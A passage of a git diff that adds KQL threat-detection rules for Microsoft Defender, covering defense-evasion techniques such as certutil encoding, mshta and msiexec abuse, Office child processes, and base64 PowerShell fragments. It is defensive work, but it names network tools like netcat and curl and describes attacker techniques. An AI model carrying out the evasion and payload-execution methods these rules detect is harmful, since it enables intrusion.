ProcessCommandLine contains "/encode" or ProcessCommandLine contains "–encode" or ProcessCommandLine contains "—encode" or ProcessCommandLine contains "―encode") and (ProcessCommandLine contains ".acl" or ProcessCommandLine contains ".bat" or ProcessCommandLine contains ".doc" or ProcessCommandLine contains ".gif" or ProcessCommandLine contains ".jpeg" or ProcessCommandLine contains ".jpg" or ProcessCommandLine contains ".mp3" or ProcessCommandLine contains ".pdf" or ProcessCommandLine contains ".png" or ProcessCommandLine contains ".ppt" or ProcessCommandLine contains ".tmp" or ProcessCommandLine contains ".xls" or ProcessCommandLine contains ".xml") and (FolderPath endswith "\\certutil.exe" or ProcessVersionInfoOriginalFileName =~ "CertUtil.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_files_in_default_gpo_folder.kql b/KQL/rules/Defense Evasion/suspicious_files_in_default_gpo_folder.kql new file mode 100644 index 00000000..24a29b1e --- /dev/null +++ b/KQL/rules/Defense Evasion/suspicious_files_in_default_gpo_folder.kql @@ -0,0 +1,10 @@ +// Title: Suspicious Files in Default GPO Folder +// Author: elhoim +// Date: 2022-04-28 +// Level: medium +// Description: Detects the creation of copy of suspicious files (EXE/DLL) to the default GPO storage folder +// MITRE Tactic: Defense Evasion +// Tags: attack.t1036.005, attack.defense-evasion + +DeviceFileEvents +| where FolderPath contains "\\Policies\\{31B2F340-016D-11D2-945F-00C04FB984F9}\\" and (FolderPath endswith ".dll" or FolderPath endswith ".exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_hh_exe_execution.kql b/KQL/rules/Defense Evasion/suspicious_hh_exe_execution.kql new file mode 100644 index 00000000..3947f385 --- /dev/null +++ b/KQL/rules/Defense Evasion/suspicious_hh_exe_execution.kql @@ -0,0 +1,10 @@ +// Title: Suspicious HH.EXE Execution +// Author: Maxim Pavlunin +// Date: 2020-04-01 +// Level: high +// Description: Detects a suspicious execution of a Microsoft HTML Help (HH.exe) +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution, attack.initial-access, attack.t1047, attack.t1059.001, attack.t1059.003, attack.t1059.005, attack.t1059.007, attack.t1218, attack.t1218.001, attack.t1218.010, attack.t1218.011, attack.t1566, attack.t1566.001 + +DeviceProcessEvents +| where (ProcessVersionInfoOriginalFileName =~ "HH.exe" or FolderPath endswith "\\hh.exe") and (ProcessCommandLine contains ".application" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains "\\Content.Outlook\\" or ProcessCommandLine contains "\\Downloads\\" or ProcessCommandLine contains "\\Users\\Public\\" or ProcessCommandLine contains "\\Windows\\Temp\\") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_high_integritylevel_conhost_legacy_option.kql b/KQL/rules/Defense Evasion/suspicious_high_integritylevel_conhost_legacy_option.kql new file mode 100644 index 00000000..affa996f --- /dev/null +++ b/KQL/rules/Defense Evasion/suspicious_high_integritylevel_conhost_legacy_option.kql @@ -0,0 +1,12 @@ +// Title: Suspicious High IntegrityLevel Conhost Legacy Option +// Author: frack113 +// Date: 2022-12-09 +// Level: informational +// Description: ForceV1 asks for information directly from the kernel space. Conhost connects to the console application. High IntegrityLevel means the process is running with elevated privileges, such as an Administrator context. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1202 +// False Positives: +// - Very Likely, including launching cmd.exe via Run As Administrator + +DeviceProcessEvents +| where (ProcessCommandLine contains "conhost.exe" and ProcessCommandLine contains "0xffffffff" and ProcessCommandLine contains "-ForceV1") and (ProcessIntegrityLevel in~ ("High", "S-1-16-12288")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_iis_url_globalrules_rewrite_via_appcmd.kql b/KQL/rules/Defense Evasion/suspicious_iis_url_globalrules_rewrite_via_appcmd.kql new file mode 100644 index 00000000..550eac24 --- /dev/null +++ b/KQL/rules/Defense Evasion/suspicious_iis_url_globalrules_rewrite_via_appcmd.kql @@ -0,0 +1,12 @@ +// Title: Suspicious IIS URL GlobalRules Rewrite Via AppCmd +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-01-22 +// Level: medium +// Description: Detects usage of "appcmd" to create new global URL rewrite rules. This behaviour has been observed being used by threat actors to add new rules so they can access their webshells. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion +// False Positives: +// - Legitimate usage of appcmd to add new URL rewrite rules + +DeviceProcessEvents +| where (ProcessCommandLine contains "set" and ProcessCommandLine contains "config" and ProcessCommandLine contains "section:system.webServer/rewrite/globalRules" and ProcessCommandLine contains "commit:") and (FolderPath endswith "\\appcmd.exe" or ProcessVersionInfoOriginalFileName =~ "appcmd.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_javascript_execution_via_mshta_exe.kql b/KQL/rules/Defense Evasion/suspicious_javascript_execution_via_mshta_exe.kql new file mode 100644 index 00000000..3fa20937 --- /dev/null +++ b/KQL/rules/Defense Evasion/suspicious_javascript_execution_via_mshta_exe.kql @@ -0,0 +1,10 @@ +// Title: Suspicious JavaScript Execution Via Mshta.EXE +// Author: E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community +// Date: 2019-10-24 +// Level: high +// Description: Detects execution of javascript code using "mshta.exe". +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.005 + +DeviceProcessEvents +| where ProcessCommandLine contains "javascript" and (FolderPath endswith "\\mshta.exe" or ProcessVersionInfoOriginalFileName =~ "MSHTA.EXE") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_lnk_double_extension_file_created.kql b/KQL/rules/Defense Evasion/suspicious_lnk_double_extension_file_created.kql new file mode 100644 index 00000000..bf8df16e --- /dev/null +++ b/KQL/rules/Defense Evasion/suspicious_lnk_double_extension_file_created.kql @@ -0,0 +1,13 @@ +// Title: Suspicious LNK Double Extension File Created +// Author: Nasreddine Bencherchali (Nextron Systems), frack113 +// Date: 2022-11-07 +// Level: medium +// Description: Detects the creation of files with an "LNK" as a second extension. This is sometimes used by malware as a method to abuse the fact that Windows hides the "LNK" extension by default. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1036.007 +// False Positives: +// - Some tuning is required for other general purpose directories of third party apps + +DeviceFileEvents +| where ((FolderPath contains ".doc." or FolderPath contains ".docx." or FolderPath contains ".jpg." or FolderPath contains ".pdf." or FolderPath contains ".ppt." or FolderPath contains ".pptx." or FolderPath contains ".xls." or FolderPath contains ".xlsx.") and FolderPath endswith ".lnk") and (not(FolderPath contains "\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\")) and (not(((InitiatingProcessFolderPath endswith "\\excel.exe" and FolderPath contains "\\AppData\\Roaming\\Microsoft\\Excel") or (InitiatingProcessFolderPath endswith "\\powerpnt.exe" and FolderPath contains "\\AppData\\Roaming\\Microsoft\\PowerPoint") or ((InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\winword.exe") and FolderPath contains "\\AppData\\Roaming\\Microsoft\\Office\\Recent\\") or (InitiatingProcessFolderPath endswith "\\winword.exe" and FolderPath contains "\\AppData\\Roaming\\Microsoft\\Word")))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_microsoft_office_child_process.kql b/KQL/rules/Defense Evasion/suspicious_microsoft_office_child_process.kql new file mode 100644 index 00000000..c7d27d6a --- /dev/null +++ b/KQL/rules/Defense Evasion/suspicious_microsoft_office_child_process.kql @@ -0,0 +1,10 @@ +// Title: Suspicious Microsoft Office Child Process +// Author: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io +// Date: 2018-04-06 +// Level: high +// Description: Detects a suspicious process spawning from one of the Microsoft Office suite products (Word, Excel, PowerPoint, Publisher, Visio, etc.) +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution, attack.t1047, attack.t1204.002, attack.t1218.010 + +DeviceProcessEvents +| where (InitiatingProcessFolderPath endswith "\\EQNEDT32.EXE" or InitiatingProcessFolderPath endswith "\\EXCEL.EXE" or InitiatingProcessFolderPath endswith "\\MSACCESS.EXE" or InitiatingProcessFolderPath endswith "\\MSPUB.exe" or InitiatingProcessFolderPath endswith "\\ONENOTE.EXE" or InitiatingProcessFolderPath endswith "\\POWERPNT.exe" or InitiatingProcessFolderPath endswith "\\VISIO.exe" or InitiatingProcessFolderPath endswith "\\WINWORD.EXE" or InitiatingProcessFolderPath endswith "\\wordpad.exe" or InitiatingProcessFolderPath endswith "\\wordview.exe") and (((ProcessVersionInfoOriginalFileName in~ ("bitsadmin.exe", "CertOC.exe", "CertUtil.exe", "Cmd.Exe", "CMSTP.EXE", "cscript.exe", "curl.exe", "HH.exe", "IEExec.exe", "InstallUtil.exe", "javaw.exe", "Microsoft.Workflow.Compiler.exe", "msdt.exe", "MSHTA.EXE", "msiexec.exe", "Msxsl.exe", "odbcconf.exe", "pcalua.exe", "PowerShell.EXE", "RegAsm.exe", "RegSvcs.exe", "REGSVR32.exe", "RUNDLL32.exe", "schtasks.exe", "ScriptRunner.exe", "wmic.exe", "WorkFolders.exe", "wscript.exe")) or (FolderPath endswith "\\AppVLP.exe" or FolderPath endswith "\\bash.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\certoc.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cmstp.exe" or FolderPath endswith "\\control.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\curl.exe" or FolderPath endswith "\\forfiles.exe" or FolderPath endswith "\\hh.exe" or FolderPath endswith "\\ieexec.exe" or FolderPath endswith "\\installutil.exe" or FolderPath endswith "\\javaw.exe" or FolderPath endswith "\\mftrace.exe" or FolderPath endswith "\\Microsoft.Workflow.Compiler.exe" or FolderPath endswith "\\msbuild.exe" or FolderPath endswith "\\msdt.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\msidb.exe" or FolderPath endswith "\\msiexec.exe" or FolderPath endswith "\\msxsl.exe" or FolderPath endswith "\\odbcconf.exe" or FolderPath endswith "\\pcalua.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regasm.exe" or FolderPath endswith "\\regsvcs.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\scrcons.exe" or FolderPath endswith "\\scriptrunner.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\svchost.exe" or FolderPath endswith "\\verclsid.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\workfolders.exe" or FolderPath endswith "\\wscript.exe")) or (FolderPath contains "\\AppData\\" or FolderPath contains "\\Users\\Public\\" or FolderPath contains "\\ProgramData\\" or FolderPath contains "\\Windows\\Tasks\\" or FolderPath contains "\\Windows\\Temp\\" or FolderPath contains "\\Windows\\System32\\Tasks\\")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_msbuild_execution_by_uncommon_parent_process.kql b/KQL/rules/Defense Evasion/suspicious_msbuild_execution_by_uncommon_parent_process.kql new file mode 100644 index 00000000..3cd23e51 --- /dev/null +++ b/KQL/rules/Defense Evasion/suspicious_msbuild_execution_by_uncommon_parent_process.kql @@ -0,0 +1,10 @@ +// Title: Suspicious Msbuild Execution By Uncommon Parent Process +// Author: frack113 +// Date: 2022-11-17 +// Level: medium +// Description: Detects suspicious execution of 'Msbuild.exe' by a uncommon parent process +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion + +DeviceProcessEvents +| where (FolderPath endswith "\\MSBuild.exe" or ProcessVersionInfoOriginalFileName =~ "MSBuild.exe") and (not((InitiatingProcessFolderPath endswith "\\devenv.exe" or InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\msbuild.exe" or InitiatingProcessFolderPath endswith "\\python.exe" or InitiatingProcessFolderPath endswith "\\explorer.exe" or InitiatingProcessFolderPath endswith "\\nuget.exe"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_msdt_parent_process.kql b/KQL/rules/Defense Evasion/suspicious_msdt_parent_process.kql new file mode 100644 index 00000000..14601d2d --- /dev/null +++ b/KQL/rules/Defense Evasion/suspicious_msdt_parent_process.kql @@ -0,0 +1,10 @@ +// Title: Suspicious MSDT Parent Process +// Author: Nextron Systems +// Date: 2022-06-01 +// Level: high +// Description: Detects msdt.exe executed by a suspicious parent as seen in CVE-2022-30190 / Follina exploitation +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1036, attack.t1218 + +DeviceProcessEvents +| where (FolderPath endswith "\\msdt.exe" or ProcessVersionInfoOriginalFileName =~ "msdt.exe") and (InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe" or InitiatingProcessFolderPath endswith "\\regsvr32.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\schtasks.exe" or InitiatingProcessFolderPath endswith "\\wmic.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe" or InitiatingProcessFolderPath endswith "\\wsl.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_mshta_child_process.kql b/KQL/rules/Defense Evasion/suspicious_mshta_child_process.kql new file mode 100644 index 00000000..15cd1ac7 --- /dev/null +++ b/KQL/rules/Defense Evasion/suspicious_mshta_child_process.kql @@ -0,0 +1,13 @@ +// Title: Suspicious MSHTA Child Process +// Author: Michael Haag +// Date: 2019-01-16 +// Level: high +// Description: Detects a suspicious process spawning from an "mshta.exe" process, which could be indicative of a malicious HTA script execution +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.005, car.2013-02-003, car.2013-03-001, car.2014-04-003 +// False Positives: +// - Printer software / driver installations +// - HP software + +DeviceProcessEvents +| where ((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\bash.exe" or FolderPath endswith "\\reg.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\bitsadmin.exe") or (ProcessVersionInfoOriginalFileName in~ ("Cmd.Exe", "PowerShell.EXE", "pwsh.dll", "wscript.exe", "cscript.exe", "Bash.exe", "reg.exe", "REGSVR32.EXE", "bitsadmin.exe"))) and InitiatingProcessFolderPath endswith "\\mshta.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_msiexec_embedding_parent.kql b/KQL/rules/Defense Evasion/suspicious_msiexec_embedding_parent.kql new file mode 100644 index 00000000..e645f938 --- /dev/null +++ b/KQL/rules/Defense Evasion/suspicious_msiexec_embedding_parent.kql @@ -0,0 +1,10 @@ +// Title: Suspicious MsiExec Embedding Parent +// Author: frack113 +// Date: 2022-04-16 +// Level: medium +// Description: Adversaries may abuse msiexec.exe to proxy the execution of malicious payloads +// MITRE Tactic: Defense Evasion +// Tags: attack.t1218.007, attack.defense-evasion + +DeviceProcessEvents +| where ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\cmd.exe") and (InitiatingProcessCommandLine contains "MsiExec.exe" and InitiatingProcessCommandLine contains "-Embedding ")) and (not(((ProcessCommandLine contains "C:\\Program Files\\SplunkUniversalForwarder\\bin\\" and FolderPath endswith ":\\Windows\\System32\\cmd.exe") or (ProcessCommandLine contains "\\DismFoDInstall.cmd" or (InitiatingProcessCommandLine contains "\\MsiExec.exe -Embedding " and InitiatingProcessCommandLine contains "Global\\MSI0000"))))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_msiexec_execute_arbitrary_dll.kql b/KQL/rules/Defense Evasion/suspicious_msiexec_execute_arbitrary_dll.kql new file mode 100644 index 00000000..142dc056 --- /dev/null +++ b/KQL/rules/Defense Evasion/suspicious_msiexec_execute_arbitrary_dll.kql @@ -0,0 +1,14 @@ +// Title: Suspicious Msiexec Execute Arbitrary DLL +// Author: frack113 +// Date: 2022-01-16 +// Level: medium +// Description: Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. +Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi) + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.007 +// False Positives: +// - Legitimate script + +DeviceProcessEvents +| where ((ProcessCommandLine contains " -y" or ProcessCommandLine contains " /y" or ProcessCommandLine contains " –y" or ProcessCommandLine contains " —y" or ProcessCommandLine contains " ―y") and FolderPath endswith "\\msiexec.exe") and (not((ProcessCommandLine contains "\\MsiExec.exe\" /Y \"C:\\Program Files\\Bonjour\\mdnsNSP.dll" or ProcessCommandLine contains "\\MsiExec.exe\" /Y \"C:\\Program Files (x86)\\Bonjour\\mdnsNSP.dll" or ProcessCommandLine contains "\\MsiExec.exe\" /Y \"C:\\Program Files (x86)\\Apple Software Update\\ScriptingObjectModel.dll" or ProcessCommandLine contains "\\MsiExec.exe\" /Y \"C:\\Program Files (x86)\\Apple Software Update\\SoftwareUpdateAdmin.dll" or ProcessCommandLine contains "\\MsiExec.exe\" /Y \"C:\\Windows\\CCM\\" or ProcessCommandLine contains "\\MsiExec.exe\" /Y C:\\Windows\\CCM\\" or ProcessCommandLine contains "\\MsiExec.exe\" -Y \"C:\\Program Files\\Bonjour\\mdnsNSP.dll" or ProcessCommandLine contains "\\MsiExec.exe\" -Y \"C:\\Program Files (x86)\\Bonjour\\mdnsNSP.dll" or ProcessCommandLine contains "\\MsiExec.exe\" -Y \"C:\\Program Files (x86)\\Apple Software Update\\ScriptingObjectModel.dll" or ProcessCommandLine contains "\\MsiExec.exe\" -Y \"C:\\Program Files (x86)\\Apple Software Update\\SoftwareUpdateAdmin.dll" or ProcessCommandLine contains "\\MsiExec.exe\" -Y \"C:\\Windows\\CCM\\" or ProcessCommandLine contains "\\MsiExec.exe\" -Y C:\\Windows\\CCM\\"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_msiexec_quiet_install_from_remote_location.kql b/KQL/rules/Defense Evasion/suspicious_msiexec_quiet_install_from_remote_location.kql new file mode 100644 index 00000000..03997270 --- /dev/null +++ b/KQL/rules/Defense Evasion/suspicious_msiexec_quiet_install_from_remote_location.kql @@ -0,0 +1,10 @@ +// Title: Suspicious Msiexec Quiet Install From Remote Location +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-10-28 +// Level: medium +// Description: Detects usage of Msiexec.exe to install packages hosted remotely quietly +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.007 + +DeviceProcessEvents +| where ((ProcessCommandLine contains "-i" or ProcessCommandLine contains "/i" or ProcessCommandLine contains "–i" or ProcessCommandLine contains "—i" or ProcessCommandLine contains "―i" or ProcessCommandLine contains "-package" or ProcessCommandLine contains "/package" or ProcessCommandLine contains "–package" or ProcessCommandLine contains "—package" or ProcessCommandLine contains "―package" or ProcessCommandLine contains "-a" or ProcessCommandLine contains "/a" or ProcessCommandLine contains "–a" or ProcessCommandLine contains "—a" or ProcessCommandLine contains "―a" or ProcessCommandLine contains "-j" or ProcessCommandLine contains "/j" or ProcessCommandLine contains "–j" or ProcessCommandLine contains "—j" or ProcessCommandLine contains "―j") and (FolderPath endswith "\\msiexec.exe" or ProcessVersionInfoOriginalFileName =~ "msiexec.exe") and (ProcessCommandLine contains "-q" or ProcessCommandLine contains "/q" or ProcessCommandLine contains "–q" or ProcessCommandLine contains "—q" or ProcessCommandLine contains "―q") and (ProcessCommandLine contains "http" or ProcessCommandLine contains "\\\\")) and (not((ProcessCommandLine contains "\\AppData\\Local\\Temp\\OpenOffice" and ProcessCommandLine contains "Installation Files\\openoffice"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_network_connection_binary_no_commandline.kql b/KQL/rules/Defense Evasion/suspicious_network_connection_binary_no_commandline.kql new file mode 100644 index 00000000..e0654e90 --- /dev/null +++ b/KQL/rules/Defense Evasion/suspicious_network_connection_binary_no_commandline.kql @@ -0,0 +1,10 @@ +// Title: Suspicious Network Connection Binary No CommandLine +// Author: Florian Roth (Nextron Systems) +// Date: 2022-07-03 +// Level: high +// Description: Detects suspicious network connections made by a well-known Windows binary run with no command line parameters +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion + +DeviceNetworkEvents +| where ((InitiatingProcessCommandLine endswith "\\regsvr32.exe" or InitiatingProcessCommandLine endswith "\\rundll32.exe" or InitiatingProcessCommandLine endswith "\\dllhost.exe") and (InitiatingProcessFolderPath endswith "\\regsvr32.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\dllhost.exe")) and (not((InitiatingProcessCommandLine =~ "" or isnull(InitiatingProcessCommandLine)))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_obfuscated_powershell_code.kql b/KQL/rules/Defense Evasion/suspicious_obfuscated_powershell_code.kql new file mode 100644 index 00000000..5e6427e8 --- /dev/null +++ b/KQL/rules/Defense Evasion/suspicious_obfuscated_powershell_code.kql @@ -0,0 +1,10 @@ +// Title: Suspicious Obfuscated PowerShell Code +// Author: Florian Roth (Nextron Systems) +// Date: 2022-07-11 +// Level: high +// Description: Detects suspicious UTF16 and base64 encoded and often obfuscated PowerShell code often used in command lines +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion + +DeviceProcessEvents +| where ProcessCommandLine contains "IAAtAGIAeABvAHIAIAAwAHgA" or ProcessCommandLine contains "AALQBiAHgAbwByACAAMAB4A" or ProcessCommandLine contains "gAC0AYgB4AG8AcgAgADAAeA" or ProcessCommandLine contains "AC4ASQBuAHYAbwBrAGUAKAApACAAfAAg" or ProcessCommandLine contains "AuAEkAbgB2AG8AawBlACgAKQAgAHwAI" or ProcessCommandLine contains "ALgBJAG4AdgBvAGsAZQAoACkAIAB8AC" or ProcessCommandLine contains "AHsAMQB9AHsAMAB9ACIAIAAtAGYAI" or ProcessCommandLine contains "B7ADEAfQB7ADAAfQAiACAALQBmAC" or ProcessCommandLine contains "AewAxAH0AewAwAH0AIgAgAC0AZgAg" or ProcessCommandLine contains "AHsAMAB9AHsAMwB9ACIAIAAtAGYAI" or ProcessCommandLine contains "B7ADAAfQB7ADMAfQAiACAALQBmAC" or ProcessCommandLine contains "AewAwAH0AewAzAH0AIgAgAC0AZgAg" or ProcessCommandLine contains "AHsAMgB9AHsAMAB9ACIAIAAtAGYAI" or ProcessCommandLine contains "B7ADIAfQB7ADAAfQAiACAALQBmAC" or ProcessCommandLine contains "AewAyAH0AewAwAH0AIgAgAC0AZgAg" or ProcessCommandLine contains "AHsAMQB9AHsAMAB9ACcAIAAtAGYAI" or ProcessCommandLine contains "B7ADEAfQB7ADAAfQAnACAALQBmAC" or ProcessCommandLine contains "AewAxAH0AewAwAH0AJwAgAC0AZgAg" or ProcessCommandLine contains "AHsAMAB9AHsAMwB9ACcAIAAtAGYAI" or ProcessCommandLine contains "B7ADAAfQB7ADMAfQAnACAALQBmAC" or ProcessCommandLine contains "AewAwAH0AewAzAH0AJwAgAC0AZgAg" or ProcessCommandLine contains "AHsAMgB9AHsAMAB9ACcAIAAtAGYAI" or ProcessCommandLine contains "B7ADIAfQB7ADAAfQAnACAALQBmAC" or ProcessCommandLine contains "AewAyAH0AewAwAH0AJwAgAC0AZgAg" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_package_installed_linux.kql b/KQL/rules/Defense Evasion/suspicious_package_installed_linux.kql new file mode 100644 index 00000000..475dce6c --- /dev/null +++ b/KQL/rules/Defense Evasion/suspicious_package_installed_linux.kql @@ -0,0 +1,12 @@ +// Title: Suspicious Package Installed - Linux +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-01-03 +// Level: medium +// Description: Detects installation of suspicious packages using system installation utilities +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1553.004 +// False Positives: +// - Legitimate administration activities + +DeviceProcessEvents +| where ((ProcessCommandLine contains "install" and (FolderPath endswith "/apt" or FolderPath endswith "/apt-get")) or ((ProcessCommandLine contains "--install" or ProcessCommandLine contains "-i") and FolderPath endswith "/dpkg") or (ProcessCommandLine contains "-i" and FolderPath endswith "/rpm") or ((ProcessCommandLine contains "localinstall" or ProcessCommandLine contains "install") and FolderPath endswith "/yum")) and (ProcessCommandLine contains "nmap" or ProcessCommandLine contains " nc" or ProcessCommandLine contains "netcat" or ProcessCommandLine contains "wireshark" or ProcessCommandLine contains "tshark" or ProcessCommandLine contains "openconnect" or ProcessCommandLine contains "proxychains") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_parent_double_extension_file_execution.kql b/KQL/rules/Defense Evasion/suspicious_parent_double_extension_file_execution.kql new file mode 100644 index 00000000..fd23deca --- /dev/null +++ b/KQL/rules/Defense Evasion/suspicious_parent_double_extension_file_execution.kql @@ -0,0 +1,10 @@ +// Title: Suspicious Parent Double Extension File Execution +// Author: frack113, Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-01-06 +// Level: high +// Description: Detect execution of suspicious double extension files in ParentCommandLine +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1036.007 + +DeviceProcessEvents +| where (InitiatingProcessFolderPath endswith ".doc.lnk" or InitiatingProcessFolderPath endswith ".docx.lnk" or InitiatingProcessFolderPath endswith ".xls.lnk" or InitiatingProcessFolderPath endswith ".xlsx.lnk" or InitiatingProcessFolderPath endswith ".ppt.lnk" or InitiatingProcessFolderPath endswith ".pptx.lnk" or InitiatingProcessFolderPath endswith ".rtf.lnk" or InitiatingProcessFolderPath endswith ".pdf.lnk" or InitiatingProcessFolderPath endswith ".txt.lnk" or InitiatingProcessFolderPath endswith ".doc.js" or InitiatingProcessFolderPath endswith ".docx.js" or InitiatingProcessFolderPath endswith ".xls.js" or InitiatingProcessFolderPath endswith ".xlsx.js" or InitiatingProcessFolderPath endswith ".ppt.js" or InitiatingProcessFolderPath endswith ".pptx.js" or InitiatingProcessFolderPath endswith ".rtf.js" or InitiatingProcessFolderPath endswith ".pdf.js" or InitiatingProcessFolderPath endswith ".txt.js") or (InitiatingProcessCommandLine contains ".doc.lnk" or InitiatingProcessCommandLine contains ".docx.lnk" or InitiatingProcessCommandLine contains ".xls.lnk" or InitiatingProcessCommandLine contains ".xlsx.lnk" or InitiatingProcessCommandLine contains ".ppt.lnk" or InitiatingProcessCommandLine contains ".pptx.lnk" or InitiatingProcessCommandLine contains ".rtf.lnk" or InitiatingProcessCommandLine contains ".pdf.lnk" or InitiatingProcessCommandLine contains ".txt.lnk" or InitiatingProcessCommandLine contains ".doc.js" or InitiatingProcessCommandLine contains ".docx.js" or InitiatingProcessCommandLine contains ".xls.js" or InitiatingProcessCommandLine contains ".xlsx.js" or InitiatingProcessCommandLine contains ".ppt.js" or InitiatingProcessCommandLine contains ".pptx.js" or InitiatingProcessCommandLine contains ".rtf.js" or InitiatingProcessCommandLine contains ".pdf.js" or InitiatingProcessCommandLine contains ".txt.js") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_path_in_keyboard_layout_ime_file_registry_value.kql b/KQL/rules/Defense Evasion/suspicious_path_in_keyboard_layout_ime_file_registry_value.kql new file mode 100644 index 00000000..c10a7be9 --- /dev/null +++ b/KQL/rules/Defense Evasion/suspicious_path_in_keyboard_layout_ime_file_registry_value.kql @@ -0,0 +1,13 @@ +// Title: Suspicious Path In Keyboard Layout IME File Registry Value +// Author: X__Junior (Nextron Systems) +// Date: 2023-11-21 +// Level: high +// Description: Detects usage of Windows Input Method Editor (IME) keyboard layout feature, which allows an attacker to load a DLL into the process after sending the WM_INPUTLANGCHANGEREQUEST message. +Before doing this, the client needs to register the DLL in a special registry key that is assumed to implement this keyboard layout. This registry key should store a value named "Ime File" with a DLL path. +IMEs are essential for languages that have more characters than can be represented on a standard keyboard, such as Chinese, Japanese, and Korean. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 + +DeviceRegistryEvents +| where (RegistryKey endswith "\\Control\\Keyboard Layouts*" and RegistryKey contains "Ime File") and ((RegistryValueData contains ":\\Perflogs\\" or RegistryValueData contains ":\\Users\\Public\\" or RegistryValueData contains ":\\Windows\\Temp\\" or RegistryValueData contains "\\AppData\\Local\\Temp\\" or RegistryValueData contains "\\AppData\\Roaming\\" or RegistryValueData contains "\\Temporary Internet") or ((RegistryValueData contains ":\\Users\\" and RegistryValueData contains "\\Favorites\\") or (RegistryValueData contains ":\\Users\\" and RegistryValueData contains "\\Favourites\\") or (RegistryValueData contains ":\\Users\\" and RegistryValueData contains "\\Contacts\\"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_ping_del_command_combination.kql b/KQL/rules/Defense Evasion/suspicious_ping_del_command_combination.kql new file mode 100644 index 00000000..369e2266 --- /dev/null +++ b/KQL/rules/Defense Evasion/suspicious_ping_del_command_combination.kql @@ -0,0 +1,10 @@ +// Title: Suspicious Ping/Del Command Combination +// Author: Ilya Krestinichev +// Date: 2022-11-03 +// Level: high +// Description: Detects a method often used by ransomware. Which combines the "ping" to wait a couple of seconds and then "del" to delete the file in question. Its used to hide the file responsible for the initial infection for example +// MITRE 